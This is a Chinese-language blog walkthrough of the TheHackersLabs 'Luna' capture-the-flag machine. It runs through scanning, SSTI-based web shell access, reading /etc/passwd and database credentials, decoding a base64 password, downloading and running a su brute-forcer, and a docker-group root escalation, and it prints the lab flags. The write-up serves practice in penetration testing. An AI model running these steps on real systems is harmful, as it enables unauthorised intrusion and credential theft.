Pepster'Blog
TheHackersLabs-Luna-Walkthrough
城南花已开 Lv6
  2025-01-31 15:42:12   2025-04-18 23:34:08    1.8k 字  10 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.167  08:00:27:df:f5:4e       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:65:b2       VMware, Inc.

12 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.087 seconds (122.66 hosts/sec). 4 responded
export ip=192.168.60.167
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.167:80
Open 192.168.60.167:5000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-31 15:42 CST
Initiating ARP Ping Scan at 15:42
Scanning 192.168.60.167 [1 port]
Completed ARP Ping Scan at 15:42, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:42
Completed Parallel DNS resolution of 1 host. at 15:42, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:42
Scanning 192.168.60.167 [2 ports]
Discovered open port 80/tcp on 192.168.60.167
Discovered open port 5000/tcp on 192.168.60.167
Completed SYN Stealth Scan at 15:42, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.167
Host is up, received arp-response (0.00036s latency).
Scanned at 2025-01-31 15:42:53 CST for 0s

PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 64
5000/tcp open  upnp    syn-ack ttl 64
MAC Address: 08:00:27:DF:F5:4E (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

哈哈🤣这个靶机比较神奇,竟然没开放22端口

常规访问80端口都是403未授权

SSTI注入

访问5000端口有个欢迎框

请输入您的姓名

image

不过我们可以看到没法输入任何东西,因为这个表单是disable的关闭的

手动修改一下元素信息即可

image

我们尝试输入49

image

疑似有SSTI注入

具体参考[TheHackersLabs-Caldo de Avecren-Walkthrough | Pepster’Blog](https://pepster.me/2025/01/16/TheHackersLabs-Caldo de Avecren-Walkthrough/#SSTI注入)

监听一下端口,拿到web shell了

发现有好多用户哇

1
2
3
4
5
6
7
8
9
10
11
12
13
❯ pwncat-cs -lp 4444
[15:49:18] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[15:49:25] received connection from 192.168.60.167:51518                                                                                    bind.py:84
[15:49:25] 0.0.0.0:4444: normalizing shell path                                                                                         manager.py:957
           192.168.60.167:51518: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
juan:x:1001:1001::/home/juan:/bin/bash
jose:x:1002:1002::/home/jose:/bin/bash
john:x:1003:1003::/home/john:/bin/bash
carmen:x:1004:1004::/home/carmen:/bin/bash

同时看了一下配置文件,发现存在sql用户凭证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ cat config.php
<?php
$servername = "localhost";
$username = "admin";
$password = "sporting";
$dbname = "rodgar";

// Crear conexión
$conn = new mysqli($servername, $username, $password, $dbname);

// Verificar conexión
if ($conn->connect_error) {
    die("Conexión fallida: " . $conn->connect_error);
}
?>
(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ ss -luntp
Netid          State           Recv-Q          Send-Q                              Local Address:Port                      Peer Address:Port          Process
udp            UNCONN          0               0                                      127.0.0.54:53                             0.0.0.0:*             
udp            UNCONN          0               0                                   127.0.0.53%lo:53                             0.0.0.0:*             
udp            UNCONN          0               0                          192.168.60.167%enp0s17:68                             0.0.0.0:*             
tcp            LISTEN          0               151                                     127.0.0.1:3306                           0.0.0.0:*             
tcp            LISTEN          0               4096                                   127.0.0.54:53                             0.0.0.0:*             
tcp            LISTEN          0               4096                                    127.0.0.1:35351                          0.0.0.0:*             
tcp            LISTEN          0               70                                      127.0.0.1:33060                          0.0.0.0:*             
tcp            LISTEN          0               4096                                127.0.0.53%lo:53                             0.0.0.0:*             
tcp            LISTEN          0               128                                       0.0.0.0:5000                           0.0.0.0:*              users:(("python",pid=1102,fd=4),("python",pid=1102,fd=3),("python",pid=748,fd=3))
tcp            LISTEN          0               511                                             *:80                                   *:*

用户提权

拿到juan的用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ mysql -uadmin -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.39-0ubuntu0.24.04.1 (Ubuntu)

Copyright (c) 2000, 2024, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| performance_schema |
| rodgar             |
+--------------------+
3 rows in set (0,01 sec)

mysql> use rodgar;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+------------------+
| Tables_in_rodgar |
+------------------+
| user             |
+------------------+
1 row in set (0,00 sec)

mysql> select * from user;
+-------+----------------------------------+
| users | password                         |
+-------+----------------------------------+
| juan  | YzBvW1VrbU0yTVRSVGU4QGpOLk0oOWIK |
+-------+----------------------------------+
1 row in set (0,00 sec)

拿到密码后尝试登入结果失败了

看了一下长度是32位,也没有故意少一位之类的

1
2
echo -n "YzBvW1VrbU0yTVRSVGU4QGpOLk0oOWIK" |wc -c
32

hash识别一下,发现大概率是base64,铸币了😅

image

1
2
3
4
5
6
echo -n "YzBvW1VrbU0yTVRSVGU4QGpOLk0oOWIK" |base64 -d
c0o[[email protected](9b
(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ su juan
Password:
juan@TheHackersLabs-Luna:/var/www/RODGAR$

成功登入

给了个密码的字典,大概率尝试爆破其余用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
juan@TheHackersLabs-Luna:~$ ls
password.txt  user.txt
juan@TheHackersLabs-Luna:~$ cat user.txt
a81be4e9b20632860d20a64c054c4150
juan@TheHackersLabs-Luna:~$ cat password.txt
Tr0ub4dor&3
M0nkey!2024
L3tMeIn@2024
S3cur3P@ssw0rd
P@ssw0rd1234
G00dP@ssw0rd!
R3liable#2024
W1nter$2024
H@ppyD@y#1
4U&Me2Day!
B3stS3cur!ty
F1rst&Last@2024

我尝试编辑用户列表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
echo -e "root\njuan\njose\njohn\ncarmen">user.txt
cat user.txt
root
juan
jose
john
carmen
(local) pwncat$ download password.txt
password.txt ━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 156/156 bytes • ? • 0:00:00
[16:03:38] downloaded 156.00B in 0.15 seconds 
cat password.txt
Tr0ub4dor&3
M0nkey!2024
L3tMeIn@2024
S3cur3P@ssw0rd
P@ssw0rd1234
G00dP@ssw0rd!
R3liable#2024
W1nter$2024
H@ppyD@y#1
4U&Me2Day!
B3stS3cur!ty
F1rst&Last@2024

结果我差点忘记了,靶机并没有开放22端口让我们爆破😅

于是只能在靶机内部su切换用户

传个suForce爆一下

1
2
3
4
5
6
7
8
9
10
11
12
13
(remote) juan@TheHackersLabs-Luna:/tmp$ wget 192.168.60.100/suForce
--2025-01-31 08:06:16--  http://192.168.60.100/suForce
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2430 (2,4K) [application/octet-stream]
Saving to: ‘suForce’

suForce            100%[===============>]   2,37K  --.-KB/s    in 0s

2025-01-31 08:06:16 (260 MB/s) - ‘suForce’ saved [2430/2430]

(remote) juan@TheHackersLabs-Luna:/tmp$ chmod +x suForce

由于suForce不能指定用户字典,只能挨个试一遍了

好在第一个就出来了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
(remote) juan@TheHackersLabs-Luna:/tmp$ ./suForce -u jose -w /home/juan/password.txt
            _____
 ___ _   _ |  ___|__  _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| ||  _| (_) | | | (_|  __/
|___/\__,_||_|  \___/|_|  \___\___|
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | jose
📖 Wordlist | /home/juan/password.txt
🔎 Status   | 8/12/66%/W1nter$2024
💥 Password | W1nter$2024
───────────────────────────────────

Root提权

切换一下用户,发现用户同时隶属于docker组中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
(remote) juan@TheHackersLabs-Luna:/tmp$ su jose
Password:
jose@TheHackersLabs-Luna:/tmp$ sudo -l
[sudo] password for jose:
Sorry, user jose may not run sudo on TheHackersLabs-Luna.
jose@TheHackersLabs-Luna:/tmp$ cd ~
jose@TheHackersLabs-Luna:~$ ls
jose@TheHackersLabs-Luna:~$ ls -al
total 8
drwxr-x--- 2 jose jose 4096 ago 13 14:34 .
drwxr-xr-x 6 root root 4096 ago 14 14:23 ..
lrwxrwxrwx 1 jose jose    9 ago 13 13:48 .bash_history -> /dev/null
jose@TheHackersLabs-Luna:~$ id
uid=1002(jose) gid=1002(jose) groups=1002(jose),111(docker)

利用docker提权即可

如遇网络问题,clash开启tun模式即可,这样靶机也能科学上网了

1
2
3
4
5
6
7
8
9
10
11
jose@TheHackersLabs-Luna:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
1f3e46996e29: Pull complete
Digest: sha256:56fa17d2a7e7f168a043a2712e63aed1f8543aeafdcee47c58dcffe38ed51099
Status: Downloaded newer image for alpine:latest
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cat /root/root.txt
74cc1c60799e0a786ac7094b532f01b1

🥳

  1. 信息收集
    1. 服务探测
    2. SSTI注入
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 502.5k
  1. 信息收集
    1. 服务探测
    2. SSTI注入
  2. 用户提权
  3. Root提权